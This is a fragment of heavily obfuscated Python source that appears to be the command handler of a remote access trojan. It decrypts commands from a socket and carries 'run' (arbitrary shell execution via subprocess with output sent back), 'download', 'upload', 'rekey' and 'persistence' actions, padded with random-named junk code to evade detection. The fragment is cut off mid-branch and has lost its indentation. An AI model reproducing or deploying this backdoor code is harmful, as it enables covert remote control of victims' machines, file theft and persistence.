utxASYTPwYNCHHtvzCyOEEqIFExAZCQvzPPcuWuRRcTEqexyjSyJkmRzCAQcESz = uSIByGHznHHkkvwwPIVnIDFmmvPIHMRIyINSxzREPRIJQsuHBAIBMOtBQvIltFA(utxASYTPwYNCHHtvzCyOEEqIFExAZCQvzPPcuWuRRcTEqexyjSyJkmRzCAQcESz, OEHyrENnDYkzJAIuCNBSRHxHyHHmxVnEGOPHyDPuWBCEHGvzvIGpMCQowNGtrSG)
qCDIlGZmYEEvlWHHSSxFPVQAdhJQwGEmGQrXGEiuVsEJIXtcEQoQDVtINvDmEzy, _, action = utxASYTPwYNCHHtvzCyOEEqIFExAZCQvzPPcuWuRRcTEqexyjSyJkmRzCAQcESz.partition(' ')
if qCDIlGZmYEEvlWHHSSxFPVQAdhJQwGEmGQrXGEiuVsEJIXtcEQoQDVtINvDmEzy == 'quit':
lzHSySNCJQnQJHQBIAHPzMuFSFRIHEBxIGrBfSIEJozxOzIWnrmRMosNHwvIrnq = 'cEtFSRCQPIQIOAwxwBzZjqxjJmFSBwyZXOIqNvQRLGCGlCsCRGHHtHCDXJNCzTG'
DJVLDDOyGRyzIyFOPIuByCnHnmDISMDDxJtpzoBmBzYxEuNbIoIylWkRDBlBNgJ = 'UzJZQsEGCBqEiOJzjQJmgAoHGGRIiRSAWIIyHzuoWFsICwJGUtxJrBytsBMFREH'
BoHREzOAuQMNpnNOqIANpozNDwsHSCzsQCzyCOeFDvFCRNztJuDEASRSAsFnvyz = 'vOBImXNklEptLxJgyIBFKLtFKqvGyEEDkLxCQXASUSsETJGDIyuExGQgHCcwofE'
if lzHSySNCJQnQJHQBIAHPzMuFSFRIHEBxIGrBfSIEJozxOzIWnrmRMosNHwvIrnq == DJVLDDOyGRyzIyFOPIuByCnHnmDISMDDxJtpzoBmBzYxEuNbIoIylWkRDBlBNgJ:
BoHREzOAuQMNpnNOqIANpozNDwsHSCzsQCzyCOeFDvFCRNztJuDEASRSAsFnvyz = 'vOBImXNklEptLxJgyIBFKLtFKqvGyEEDkLxCQXASUSsETJGDIyuExGQgHCcwofE'
BoHREzOAuQMNpnNOqIANpozNDwsHSCzsQCzyCOeFDvFCRNztJuDEASRSAsFnvyz = lzHSySNCJQnQJHQBIAHPzMuFSFRIHEBxIGrBfSIEJozxOzIWnrmRMosNHwvIrnq
else:
BoHREzOAuQMNpnNOqIANpozNDwsHSCzsQCzyCOeFDvFCRNztJuDEASRSAsFnvyz = 'vOBImXNklEptLxJgyIBFKLtFKqvGyEEDkLxCQXASUSsETJGDIyuExGQgHCcwofE'
BoHREzOAuQMNpnNOqIANpozNDwsHSCzsQCzyCOeFDvFCRNztJuDEASRSAsFnvyz = 'cEtFSRCQPIQIOAwxwBzZjqxjJmFSBwyZXOIqNvQRLGCGlCsCRGHHtHCDXJNCzTG'
IyQBkHZzzQArtBOPSywnHwuBSJeEvICCIFDvYpHJMEprXJpuBDhwGrPOUQyMyYE.close()
sys.exit(0)
elif qCDIlGZmYEEvlWHHSSxFPVQAdhJQwGEmGQrXGEiuVsEJIXtcEQoQDVtINvDmEzy == 'run':
gVNGNypRryCCyTzESJzrQCqqQQBGJRqSRWDZSqDxHuGHIPQCvGSzwHIEIxSAsBG = 'oHWGBxHIFOEmRQpBvxrPRrYuZDwPcNADyiWvAYmQfBRnQoyXoAyDRGorhjHCJBg'
SCqHrMGJEQFERBQNNEtoyuGrCBFGlJxQQmnQGuUFUCRwiGEOHSUSwOlLRMgHvtw = 'vvztLwHGCSSEmEMDRqIPFHONIvDITSZSJoEyPFxEyEmDDRDwryluQCPxCGwjFjX'
if gVNGNypRryCCyTzESJzrQCqqQQBGJRqSRWDZSqDxHuGHIPQCvGSzwHIEIxSAsBG != SCqHrMGJEQFERBQNNEtoyuGrCBFGlJxQQmnQGuUFUCRwiGEOHSUSwOlLRMgHvtw:
gVNGNypRryCCyTzESJzrQCqqQQBGJRqSRWDZSqDxHuGHIPQCvGSzwHIEIxSAsBG = 'vvztLwHGCSSEmEMDRqIPFHONIvDITSZSJoEyPFxEyEmDDRDwryluQCPxCGwjFjX'
SCqHrMGJEQFERBQNNEtoyuGrCBFGlJxQQmnQGuUFUCRwiGEOHSUSwOlLRMgHvtw = gVNGNypRryCCyTzESJzrQCqqQQBGJRqSRWDZSqDxHuGHIPQCvGSzwHIEIxSAsBG
gVNGNypRryCCyTzESJzrQCqqQQBGJRqSRWDZSqDxHuGHIPQCvGSzwHIEIxSAsBG = 'oHWGBxHIFOEmRQpBvxrPRrYuZDwPcNADyiWvAYmQfBRnQoyXoAyDRGorhjHCJBg'
RsZDxLqMFNFmOtTxGAIxJEJPCSSCFkDRvtwQtHEotQQLxrIIPrZIefgnhNpRPSz = subprocess.Popen(action, shell=True,
stdout=subprocess.PIPE, stderr=subprocess.PIPE,
stdin=subprocess.PIPE)
RsZDxLqMFNFmOtTxGAIxJEJPCSSCFkDRvtwQtHEotQQLxrIIPrZIefgnhNpRPSz = RsZDxLqMFNFmOtTxGAIxJEJPCSSCFkDRvtwQtHEotQQLxrIIPrZIefgnhNpRPSz.stdout.read() + RsZDxLqMFNFmOtTxGAIxJEJPCSSCFkDRvtwQtHEotQQLxrIIPrZIefgnhNpRPSz.stderr.read()
IyQBkHZzzQArtBOPSywnHwuBSJeEvICCIFDvYpHJMEprXJpuBDhwGrPOUQyMyYE.sendall(SPuftCNRrBmEOHCGpJsNAREOsyuxkCNDSBrSxGriSZOARHCTADxEyFHFPgOgFtg(RsZDxLqMFNFmOtTxGAIxJEJPCSSCFkDRvtwQtHEotQQLxrIIPrZIefgnhNpRPSz, OEHyrENnDYkzJAIuCNBSRHxHyHHmxVnEGOPHyDPuWBCEHGvzvIGpMCQowNGtrSG))
elif qCDIlGZmYEEvlWHHSSxFPVQAdhJQwGEmGQrXGEiuVsEJIXtcEQoQDVtINvDmEzy == 'download':
vxRESNbozESZrFNBwDSsfPFAiJNVwzCADwTyBIytvVEUuCSfEeLEAICsQDsqFzJ = 'SuGMSGSoukMArRFzOIURIvASABDEQQQvxvGEPBFyGCVSHSHDDHIpRDFpSvWQCEF'
HzCExPEEGFsUyApREYBRwDJQFzvGwxHIyySDvkxxpDplZkypmjFWiAJmSIOFFFx = 'xyqpQHznyFWQQBBxgSvDIRJeANBRWhOttInNmQuIuIHGIIEnArQiFzORAXwElrn'
pxDOIJOEABDESCsytsRAhRHxJEfWwMOIwuzzfFCSEQMDOuYvwRsnFAIxwyrtzEE = 'uQPOxvxQOzGvXyztpnuPtxiBVGyBprBomGsSzQFJzeyEHDrzzHAGOPyByJzJDSH'
QjvQDXPuCmrrQIIVADMCBBJEPmCEjNzTrvhEHQDnQNORMyxFpgNDhNDvFSyvPvE = 'mxmEFtzHPPqHRxOOySRIFDjERQMCXwRBvjrqHVQSqAytIJmHChFVEAJFfzIymGs'
if HzCExPEEGFsUyApREYBRwDJQFzvGwxHIyySDvkxxpDplZkypmjFWiAJmSIOFFFx == vxRESNbozESZrFNBwDSsfPFAiJNVwzCADwTyBIytvVEUuCSfEeLEAICsQDsqFzJ:
for vxRESNbozESZrFNBwDSsfPFAiJNVwzCADwTyBIytvVEUuCSfEeLEAICsQDsqFzJ in HzCExPEEGFsUyApREYBRwDJQFzvGwxHIyySDvkxxpDplZkypmjFWiAJmSIOFFFx:
if HzCExPEEGFsUyApREYBRwDJQFzvGwxHIyySDvkxxpDplZkypmjFWiAJmSIOFFFx == HzCExPEEGFsUyApREYBRwDJQFzvGwxHIyySDvkxxpDplZkypmjFWiAJmSIOFFFx:
pxDOIJOEABDESCsytsRAhRHxJEfWwMOIwuzzfFCSEQMDOuYvwRsnFAIxwyrtzEE = 'QjvQDXPuCmrrQIIVADMCBBJEPmCEjNzTrvhEHQDnQNORMyxFpgNDhNDvFSyvPvE'
elif pxDOIJOEABDESCsytsRAhRHxJEfWwMOIwuzzfFCSEQMDOuYvwRsnFAIxwyrtzEE == QjvQDXPuCmrrQIIVADMCBBJEPmCEjNzTrvhEHQDnQNORMyxFpgNDhNDvFSyvPvE:
QjvQDXPuCmrrQIIVADMCBBJEPmCEjNzTrvhEHQDnQNORMyxFpgNDhNDvFSyvPvE = vxRESNbozESZrFNBwDSsfPFAiJNVwzCADwTyBIytvVEUuCSfEeLEAICsQDsqFzJ
else:
vxRESNbozESZrFNBwDSsfPFAiJNVwzCADwTyBIytvVEUuCSfEeLEAICsQDsqFzJ = HzCExPEEGFsUyApREYBRwDJQFzvGwxHIyySDvkxxpDplZkypmjFWiAJmSIOFFFx
elif pxDOIJOEABDESCsytsRAhRHxJEfWwMOIwuzzfFCSEQMDOuYvwRsnFAIxwyrtzEE == pxDOIJOEABDESCsytsRAhRHxJEfWwMOIwuzzfFCSEQMDOuYvwRsnFAIxwyrtzEE:
for pxDOIJOEABDESCsytsRAhRHxJEfWwMOIwuzzfFCSEQMDOuYvwRsnFAIxwyrtzEE in HzCExPEEGFsUyApREYBRwDJQFzvGwxHIyySDvkxxpDplZkypmjFWiAJmSIOFFFx:
if QjvQDXPuCmrrQIIVADMCBBJEPmCEjNzTrvhEHQDnQNORMyxFpgNDhNDvFSyvPvE == HzCExPEEGFsUyApREYBRwDJQFzvGwxHIyySDvkxxpDplZkypmjFWiAJmSIOFFFx:
pxDOIJOEABDESCsytsRAhRHxJEfWwMOIwuzzfFCSEQMDOuYvwRsnFAIxwyrtzEE = 'QjvQDXPuCmrrQIIVADMCBBJEPmCEjNzTrvhEHQDnQNORMyxFpgNDhNDvFSyvPvE'
elif pxDOIJOEABDESCsytsRAhRHxJEfWwMOIwuzzfFCSEQMDOuYvwRsnFAIxwyrtzEE == QjvQDXPuCmrrQIIVADMCBBJEPmCEjNzTrvhEHQDnQNORMyxFpgNDhNDvFSyvPvE:
QjvQDXPuCmrrQIIVADMCBBJEPmCEjNzTrvhEHQDnQNORMyxFpgNDhNDvFSyvPvE = vxRESNbozESZrFNBwDSsfPFAiJNVwzCADwTyBIytvVEUuCSfEeLEAICsQDsqFzJ
else:
vxRESNbozESZrFNBwDSsfPFAiJNVwzCADwTyBIytvVEUuCSfEeLEAICsQDsqFzJ = HzCExPEEGFsUyApREYBRwDJQFzvGwxHIyySDvkxxpDplZkypmjFWiAJmSIOFFFx
for pxDOIJOEABDESCsytsRAhRHxJEfWwMOIwuzzfFCSEQMDOuYvwRsnFAIxwyrtzEE in HzCExPEEGFsUyApREYBRwDJQFzvGwxHIyySDvkxxpDplZkypmjFWiAJmSIOFFFx:
if QjvQDXPuCmrrQIIVADMCBBJEPmCEjNzTrvhEHQDnQNORMyxFpgNDhNDvFSyvPvE == HzCExPEEGFsUyApREYBRwDJQFzvGwxHIyySDvkxxpDplZkypmjFWiAJmSIOFFFx:
pxDOIJOEABDESCsytsRAhRHxJEfWwMOIwuzzfFCSEQMDOuYvwRsnFAIxwyrtzEE = 'QjvQDXPuCmrrQIIVADMCBBJEPmCEjNzTrvhEHQDnQNORMyxFpgNDhNDvFSyvPvE'
elif pxDOIJOEABDESCsytsRAhRHxJEfWwMOIwuzzfFCSEQMDOuYvwRsnFAIxwyrtzEE == QjvQDXPuCmrrQIIVADMCBBJEPmCEjNzTrvhEHQDnQNORMyxFpgNDhNDvFSyvPvE:
QjvQDXPuCmrrQIIVADMCBBJEPmCEjNzTrvhEHQDnQNORMyxFpgNDhNDvFSyvPvE = vxRESNbozESZrFNBwDSsfPFAiJNVwzCADwTyBIytvVEUuCSfEeLEAICsQDsqFzJ
else:
vxRESNbozESZrFNBwDSsfPFAiJNVwzCADwTyBIytvVEUuCSfEeLEAICsQDsqFzJ = QjvQDXPuCmrrQIIVADMCBBJEPmCEjNzTrvhEHQDnQNORMyxFpgNDhNDvFSyvPvE
else:
vxRESNbozESZrFNBwDSsfPFAiJNVwzCADwTyBIytvVEUuCSfEeLEAICsQDsqFzJ = HzCExPEEGFsUyApREYBRwDJQFzvGwxHIyySDvkxxpDplZkypmjFWiAJmSIOFFFx
for HxwHvBvAuGyRHsGvpSuwCSfFJRIPHwhyURHCLIDxjNxXPBlJyOlGJNMxwzfohSQ in action.split():
InjExZKpzSEvAGTkLoZHJzuNsQxDSQCqFyFCrGrsPQDqAPHBAAROEyBSGsEIaOG = 'wuSkQpBFwBZtJDFotMOoWxWFGSyxSoHsMSAOujuOGtqqPZSSEDYISPNCOpuJHDC'
IBywwnSWCIIzSHHESODCpOxxxuPBvGrBQvDkuWwTjQqvmoEQYvAoluCqLiZDotJ = 'XGpQSHPIQQwNHJmvuyEJZCoRSNrUIyHEIkDyvxvJJhzrAIGtLHBAutASzIOJADv'
xFrIiQASzSNxYIOuyovRHxzzppSrJSuwBTsJzNjtJGvHRvSfNItmIOputHLyNqx = 'RYDlWDuDIIvssuSFkivGGTzSqkoIzuFGwiXBvzFMILWHRMEOnHOMJFuqFPBBbSH'
rJRDFRHDuJBIAzAxIPrpUUwtIyQuvPPewuRivyGOEsGLqAmyGSQUgCFubInyvrn = 'roXptSSltRKyLyHouySIRnEFmzwuzQSFFuzvDEugDVESzwZBlDSNekCRmoBDrsv'
EFWAqnGCpFDHSlHHHuXjJAESOFRZDumSyDQpHJPDbQpzRLIDSUBInmlrJiIyJGO = 'RHSyCrCezQqbDpuIFNJEUBwkxzOuImujSOQVnOJANENQiBKoJyArcRIuGNoHCWq'
NSfIHSfEzDwpHXDyQAOzFISPQkFHEczRxoECNxpSGHbJIGuBXEAtHJRmOyBPCyt = 'hxzPsyvPnJpznvGBOHcXzvCRwAWMyCCfQqQRAEIyYfmLyCuHDVRtqfvDqBxCYXC'
if InjExZKpzSEvAGTkLoZHJzuNsQxDSQCqFyFCrGrsPQDqAPHBAAROEyBSGsEIaOG != rJRDFRHDuJBIAzAxIPrpUUwtIyQuvPPewuRivyGOEsGLqAmyGSQUgCFubInyvrn:
IBywwnSWCIIzSHHESODCpOxxxuPBvGrBQvDkuWwTjQqvmoEQYvAoluCqLiZDotJ = xFrIiQASzSNxYIOuyovRHxzzppSrJSuwBTsJzNjtJGvHRvSfNItmIOputHLyNqx
for NSfIHSfEzDwpHXDyQAOzFISPQkFHEczRxoECNxpSGHbJIGuBXEAtHJRmOyBPCyt in rJRDFRHDuJBIAzAxIPrpUUwtIyQuvPPewuRivyGOEsGLqAmyGSQUgCFubInyvrn:
if NSfIHSfEzDwpHXDyQAOzFISPQkFHEczRxoECNxpSGHbJIGuBXEAtHJRmOyBPCyt != xFrIiQASzSNxYIOuyovRHxzzppSrJSuwBTsJzNjtJGvHRvSfNItmIOputHLyNqx:
IBywwnSWCIIzSHHESODCpOxxxuPBvGrBQvDkuWwTjQqvmoEQYvAoluCqLiZDotJ = IBywwnSWCIIzSHHESODCpOxxxuPBvGrBQvDkuWwTjQqvmoEQYvAoluCqLiZDotJ
else:
EFWAqnGCpFDHSlHHHuXjJAESOFRZDumSyDQpHJPDbQpzRLIDSUBInmlrJiIyJGO = InjExZKpzSEvAGTkLoZHJzuNsQxDSQCqFyFCrGrsPQDqAPHBAAROEyBSGsEIaOG
else:
xFrIiQASzSNxYIOuyovRHxzzppSrJSuwBTsJzNjtJGvHRvSfNItmIOputHLyNqx = InjExZKpzSEvAGTkLoZHJzuNsQxDSQCqFyFCrGrsPQDqAPHBAAROEyBSGsEIaOG
InjExZKpzSEvAGTkLoZHJzuNsQxDSQCqFyFCrGrsPQDqAPHBAAROEyBSGsEIaOG = EFWAqnGCpFDHSlHHHuXjJAESOFRZDumSyDQpHJPDbQpzRLIDSUBInmlrJiIyJGO
if xFrIiQASzSNxYIOuyovRHxzzppSrJSuwBTsJzNjtJGvHRvSfNItmIOputHLyNqx == InjExZKpzSEvAGTkLoZHJzuNsQxDSQCqFyFCrGrsPQDqAPHBAAROEyBSGsEIaOG:
for NSfIHSfEzDwpHXDyQAOzFISPQkFHEczRxoECNxpSGHbJIGuBXEAtHJRmOyBPCyt in InjExZKpzSEvAGTkLoZHJzuNsQxDSQCqFyFCrGrsPQDqAPHBAAROEyBSGsEIaOG:
if NSfIHSfEzDwpHXDyQAOzFISPQkFHEczRxoECNxpSGHbJIGuBXEAtHJRmOyBPCyt == xFrIiQASzSNxYIOuyovRHxzzppSrJSuwBTsJzNjtJGvHRvSfNItmIOputHLyNqx:
xFrIiQASzSNxYIOuyovRHxzzppSrJSuwBTsJzNjtJGvHRvSfNItmIOputHLyNqx = InjExZKpzSEvAGTkLoZHJzuNsQxDSQCqFyFCrGrsPQDqAPHBAAROEyBSGsEIaOG
else:
xFrIiQASzSNxYIOuyovRHxzzppSrJSuwBTsJzNjtJGvHRvSfNItmIOputHLyNqx = EFWAqnGCpFDHSlHHHuXjJAESOFRZDumSyDQpHJPDbQpzRLIDSUBInmlrJiIyJGO
HxwHvBvAuGyRHsGvpSuwCSfFJRIPHwhyURHCLIDxjNxXPBlJyOlGJNMxwzfohSQ = HxwHvBvAuGyRHsGvpSuwCSfFJRIPHwhyURHCLIDxjNxXPBlJyOlGJNMxwzfohSQ.strip()
kyvylzQylABvsJoPANuHBJzJofEFAOEIIiJpCEDRxoQNolMqHtFCHxSyBSrFSCC(IyQBkHZzzQArtBOPSywnHwuBSJeEvICCIFDvYpHJMEprXJpuBDhwGrPOUQyMyYE, HxwHvBvAuGyRHsGvpSuwCSfFJRIPHwhyURHCLIDxjNxXPBlJyOlGJNMxwzfohSQ, OEHyrENnDYkzJAIuCNBSRHxHyHHmxVnEGOPHyDPuWBCEHGvzvIGpMCQowNGtrSG)
elif qCDIlGZmYEEvlWHHSSxFPVQAdhJQwGEmGQrXGEiuVsEJIXtcEQoQDVtINvDmEzy == 'upload':
sRFQSjfuxYMvEmxlCXPwyRPzrGIwQAQSNArRSFzNHGYEQsdSlOGtAzRbqyJxliA = 'iGRkxJSAGLKFwDyDnFxPQHvUYPADOrOUnusPSGfAzBxCGVyAukvxSuhPSCzJRUC'
QJzSDIJezitDcGPIlXkryQRvGshPCNGoAtspzhwEORtFIDiFBQROECJEFGTXc = 'IGAPFSGIIGQqtGFBBuPDGSANLDYHZpvSPJXERMLTDiCORlCJCFCOCoASAJwrwYB'
if sRFQSjfuxYMvEmxlCXPwyRPzrGIwQAQSNArRSFzNHGYEQsdSlOGtAzRbqyJxliA != QJzSDIJezitDcGPIlXkryQRvGshPCNGoAtspzhwEORtFIDiFBQROECJEFGTXc:
sRFQSjfuxYMvEmxlCXPwyRPzrGIwQAQSNArRSFzNHGYEQsdSlOGtAzRbqyJxliA = 'IGAPFSGIIGQqtGFBBuPDGSANLDYHZpvSPJXERMLTDiCORlCJCFCOCoASAJwrwYB'
QJzSDIJezitDcGPIlXkryQRvGshPCNGoAtspzhwEORtFIDiFBQROECJEFGTXc = sRFQSjfuxYMvEmxlCXPwyRPzrGIwQAQSNArRSFzNHGYEQsdSlOGtAzRbqyJxliA
sRFQSjfuxYMvEmxlCXPwyRPzrGIwQAQSNArRSFzNHGYEQsdSlOGtAzRbqyJxliA = 'iGRkxJSAGLKFwDyDnFxPQHvUYPADOrOUnusPSGfAzBxCGVyAukvxSuhPSCzJRUC'
for HxwHvBvAuGyRHsGvpSuwCSfFJRIPHwhyURHCLIDxjNxXPBlJyOlGJNMxwzfohSQ in action.split():
LAFSpsoxCuWxCiyQDmIDzAFPHCyARxmBRYbJooSpFkPDDRhJExPuJprsQQJIYP = 'zLFSVYSvsJRyyXQkkFFBOJtHIuYYyzYYFswCHHpZTHkzrGJqGEJOFzYDOfWFfx'
HCtOsxzZIIyWZJvgqJzsmuECpvBvtxAPQaijvRAFwwypzFFBcGSBRPsIBHLqHHU = 'rMhzIYCQAJIPSPEyPpGDHHqfCCFESOwhxmvwrSJCTGQHSuqIPmtuzHLRrJIExC'
yxWEhWRuFqHsEsztFXSEgXFJcJyznQvnmnihbsREEQJySzDuWMBSyxQtOwFwGFD = 'HqWvoJJyLsyQPuBDkrnLGJYDSUoRSHANCQpyjsJDOUAtkImiHMrHlPAHCrRIHmj'
GrptwREQIxxsDNGHkeGESJQPDSFnpyjVtQDkHstwkJkvAlpmyFBDSvXOsuDPESh = 'MIsTPKREJAzzCJyWHHOxQnFzIBsxyFWrvICpIuJuRSdsGCgHGCGqHkvJwttLUFv'
yxOzAHJAPtGPpSQyERJHwySSDAwxIuIOCOwxFJHDkJBCkDsPGHYHRCvPIxQyxGN = 'jooAHpwPyCEIGOvOdIJODUltyEAzxAHxGwvBRyGCHVGHsnEIuGOYjEJGMyIyHDS'
vmIyCvEIrXuzkwVhyDVMwOGNSZVJndPBiqqLuzAskMPCyBISxtTyrgHrRYIMCHn = 'IBBQAErwozkmBJEjzQdCuzQUkXPJVrntymwPkGGCrBImJxHrUHCnzAGReDxpyzo'
if yxWEhWRuFqHsEsztFXSEgXFJcJyznQvnmnihbsREEQJySzDuWMBSyxQtOwFwGFD == GrptwREQIxxsDNGHkeGESJQPDSFnpyjVtQDkHstwkJkvAlpmyFBDSvXOsuDPESh:
for vmIyCvEIrXuzkwVhyDVMwOGNSZVJndPBiqqLuzAskMPCyBISxtTyrgHrRYIMCHn in yxOzAHJAPtGPpSQyERJHwySSDAwxIuIOCOwxFJHDkJBCkDsPGHYHRCvPIxQyxGN:
if vmIyCvEIrXuzkwVhyDVMwOGNSZVJndPBiqqLuzAskMPCyBISxtTyrgHrRYIMCHn == GrptwREQIxxsDNGHkeGESJQPDSFnpyjVtQDkHstwkJkvAlpmyFBDSvXOsuDPESh:
yxOzAHJAPtGPpSQyERJHwySSDAwxIuIOCOwxFJHDkJBCkDsPGHYHRCvPIxQyxGN = LAFSpsoxCuWxCiyQDmIDzAFPHCyARxmBRYbJooSpFkPDDRhJExPuJprsQQJIYP
else:
GrptwREQIxxsDNGHkeGESJQPDSFnpyjVtQDkHstwkJkvAlpmyFBDSvXOsuDPESh = HCtOsxzZIIyWZJvgqJzsmuECpvBvtxAPQaijvRAFwwypzFFBcGSBRPsIBHLqHHU
HxwHvBvAuGyRHsGvpSuwCSfFJRIPHwhyURHCLIDxjNxXPBlJyOlGJNMxwzfohSQ = HxwHvBvAuGyRHsGvpSuwCSfFJRIPHwhyURHCLIDxjNxXPBlJyOlGJNMxwzfohSQ.strip()
vIRwVSrRIoGDyAzHuoJjtNEGPQATAHFuAoCIjSvXYCAHcDGzOHiuVDIDtwoJGpy(IyQBkHZzzQArtBOPSywnHwuBSJeEvICCIFDvYpHJMEprXJpuBDhwGrPOUQyMyYE, HxwHvBvAuGyRHsGvpSuwCSfFJRIPHwhyURHCLIDxjNxXPBlJyOlGJNMxwzfohSQ, OEHyrENnDYkzJAIuCNBSRHxHyHHmxVnEGOPHyDPuWBCEHGvzvIGpMCQowNGtrSG)
elif qCDIlGZmYEEvlWHHSSxFPVQAdhJQwGEmGQrXGEiuVsEJIXtcEQoQDVtINvDmEzy == 'rekey':
LheBBgEnSyvFDxsrGXFCvCTBzVFiAqAvyZBPqPsxnxHwDGERADDBxCZQmPSuwwF = 'YRPxQgCSGQEjzWhrszySvXwBFePYGIjEkGnJvJHxEmvDPNSEyNCFcFsQslRSzFI'
CHJvEDDFnyoONoWjBxDwRDsFEuPYGQnMUIqwofOuFgmFDBuiyfwIFzSvJNGHqFI = 'xopFqIBxBwvWJJNBYwyumGgfPAGJouCFRFJCFwOTAFmDlzCNuylQqrCBwNBAOYG'
HImPCGyyzBQIJrzAvSIEtErGSORzEAGySyHHRXCHGZBCGJGsAhGtSvIOHOCJLOC = 'vEDFQHjumFXDrVCvKSqFJCSjRvBDsmHveTJADwQzRHwFJJBzAuSIHhGxPtjvyYx'
SJVHHqtlBPRbmFhINiDGsCEtzrQCozSspSzBJqOBUBFAGBGyGIkzJlNxTtJHGGv = 'nEMOlnHGQpiZHHwQQyOuvyAprGEqBNewoEPEbmAHAuQSvxlGFdCDEZRvmJJHywI'
if CHJvEDDFnyoONoWjBxDwRDsFEuPYGQnMUIqwofOuFgmFDBuiyfwIFzSvJNGHqFI == LheBBgEnSyvFDxsrGXFCvCTBzVFiAqAvyZBPqPsxnxHwDGERADDBxCZQmPSuwwF:
for LheBBgEnSyvFDxsrGXFCvCTBzVFiAqAvyZBPqPsxnxHwDGERADDBxCZQmPSuwwF in CHJvEDDFnyoONoWjBxDwRDsFEuPYGQnMUIqwofOuFgmFDBuiyfwIFzSvJNGHqFI:
if CHJvEDDFnyoONoWjBxDwRDsFEuPYGQnMUIqwofOuFgmFDBuiyfwIFzSvJNGHqFI == CHJvEDDFnyoONoWjBxDwRDsFEuPYGQnMUIqwofOuFgmFDBuiyfwIFzSvJNGHqFI:
HImPCGyyzBQIJrzAvSIEtErGSORzEAGySyHHRXCHGZBCGJGsAhGtSvIOHOCJLOC = 'SJVHHqtlBPRbmFhINiDGsCEtzrQCozSspSzBJqOBUBFAGBGyGIkzJlNxTtJHGGv'
elif HImPCGyyzBQIJrzAvSIEtErGSORzEAGySyHHRXCHGZBCGJGsAhGtSvIOHOCJLOC == SJVHHqtlBPRbmFhINiDGsCEtzrQCozSspSzBJqOBUBFAGBGyGIkzJlNxTtJHGGv:
SJVHHqtlBPRbmFhINiDGsCEtzrQCozSspSzBJqOBUBFAGBGyGIkzJlNxTtJHGGv = LheBBgEnSyvFDxsrGXFCvCTBzVFiAqAvyZBPqPsxnxHwDGERADDBxCZQmPSuwwF
else:
LheBBgEnSyvFDxsrGXFCvCTBzVFiAqAvyZBPqPsxnxHwDGERADDBxCZQmPSuwwF = CHJvEDDFnyoONoWjBxDwRDsFEuPYGQnMUIqwofOuFgmFDBuiyfwIFzSvJNGHqFI
elif HImPCGyyzBQIJrzAvSIEtErGSORzEAGySyHHRXCHGZBCGJGsAhGtSvIOHOCJLOC == HImPCGyyzBQIJrzAvSIEtErGSORzEAGySyHHRXCHGZBCGJGsAhGtSvIOHOCJLOC:
for HImPCGyyzBQIJrzAvSIEtErGSORzEAGySyHHRXCHGZBCGJGsAhGtSvIOHOCJLOC in CHJvEDDFnyoONoWjBxDwRDsFEuPYGQnMUIqwofOuFgmFDBuiyfwIFzSvJNGHqFI:
if SJVHHqtlBPRbmFhINiDGsCEtzrQCozSspSzBJqOBUBFAGBGyGIkzJlNxTtJHGGv == CHJvEDDFnyoONoWjBxDwRDsFEuPYGQnMUIqwofOuFgmFDBuiyfwIFzSvJNGHqFI:
HImPCGyyzBQIJrzAvSIEtErGSORzEAGySyHHRXCHGZBCGJGsAhGtSvIOHOCJLOC = 'SJVHHqtlBPRbmFhINiDGsCEtzrQCozSspSzBJqOBUBFAGBGyGIkzJlNxTtJHGGv'
elif HImPCGyyzBQIJrzAvSIEtErGSORzEAGySyHHRXCHGZBCGJGsAhGtSvIOHOCJLOC == SJVHHqtlBPRbmFhINiDGsCEtzrQCozSspSzBJqOBUBFAGBGyGIkzJlNxTtJHGGv:
SJVHHqtlBPRbmFhINiDGsCEtzrQCozSspSzBJqOBUBFAGBGyGIkzJlNxTtJHGGv = LheBBgEnSyvFDxsrGXFCvCTBzVFiAqAvyZBPqPsxnxHwDGERADDBxCZQmPSuwwF
else:
LheBBgEnSyvFDxsrGXFCvCTBzVFiAqAvyZBPqPsxnxHwDGERADDBxCZQmPSuwwF = CHJvEDDFnyoONoWjBxDwRDsFEuPYGQnMUIqwofOuFgmFDBuiyfwIFzSvJNGHqFI
for HImPCGyyzBQIJrzAvSIEtErGSORzEAGySyHHRXCHGZBCGJGsAhGtSvIOHOCJLOC in CHJvEDDFnyoONoWjBxDwRDsFEuPYGQnMUIqwofOuFgmFDBuiyfwIFzSvJNGHqFI:
if SJVHHqtlBPRbmFhINiDGsCEtzrQCozSspSzBJqOBUBFAGBGyGIkzJlNxTtJHGGv == CHJvEDDFnyoONoWjBxDwRDsFEuPYGQnMUIqwofOuFgmFDBuiyfwIFzSvJNGHqFI:
HImPCGyyzBQIJrzAvSIEtErGSORzEAGySyHHRXCHGZBCGJGsAhGtSvIOHOCJLOC = 'SJVHHqtlBPRbmFhINiDGsCEtzrQCozSspSzBJqOBUBFAGBGyGIkzJlNxTtJHGGv'
elif HImPCGyyzBQIJrzAvSIEtErGSORzEAGySyHHRXCHGZBCGJGsAhGtSvIOHOCJLOC == SJVHHqtlBPRbmFhINiDGsCEtzrQCozSspSzBJqOBUBFAGBGyGIkzJlNxTtJHGGv:
SJVHHqtlBPRbmFhINiDGsCEtzrQCozSspSzBJqOBUBFAGBGyGIkzJlNxTtJHGGv = LheBBgEnSyvFDxsrGXFCvCTBzVFiAqAvyZBPqPsxnxHwDGERADDBxCZQmPSuwwF
else:
LheBBgEnSyvFDxsrGXFCvCTBzVFiAqAvyZBPqPsxnxHwDGERADDBxCZQmPSuwwF = SJVHHqtlBPRbmFhINiDGsCEtzrQCozSspSzBJqOBUBFAGBGyGIkzJlNxTtJHGGv
else:
LheBBgEnSyvFDxsrGXFCvCTBzVFiAqAvyZBPqPsxnxHwDGERADDBxCZQmPSuwwF = CHJvEDDFnyoONoWjBxDwRDsFEuPYGQnMUIqwofOuFgmFDBuiyfwIFzSvJNGHqFI
OEHyrENnDYkzJAIuCNBSRHxHyHHmxVnEGOPHyDPuWBCEHGvzvIGpMCQowNGtrSG = vtMRvNIZLQjyJnDNOMACSDDwRCSJsDWOiDOCIESrasNPSuqDRsJHTwoEvItFRqw(IyQBkHZzzQArtBOPSywnHwuBSJeEvICCIFDvYpHJMEprXJpuBDhwGrPOUQyMyYE)
elif qCDIlGZmYEEvlWHHSSxFPVQAdhJQwGEmGQrXGEiuVsEJIXtcEQoQDVtINvDmEzy == 'persistence':
JIHHyrVIkOepptFZnjIyIDAOwlYQnCSOJNzASAzMnIWgeIvuPAQtJpsDquwfjNS = 'GJHrOzPIvQqWvXFRAHQSIiwSnvDrsCsvOARsSwhGziNpyojCQsqSqAHwHSBMnRk'
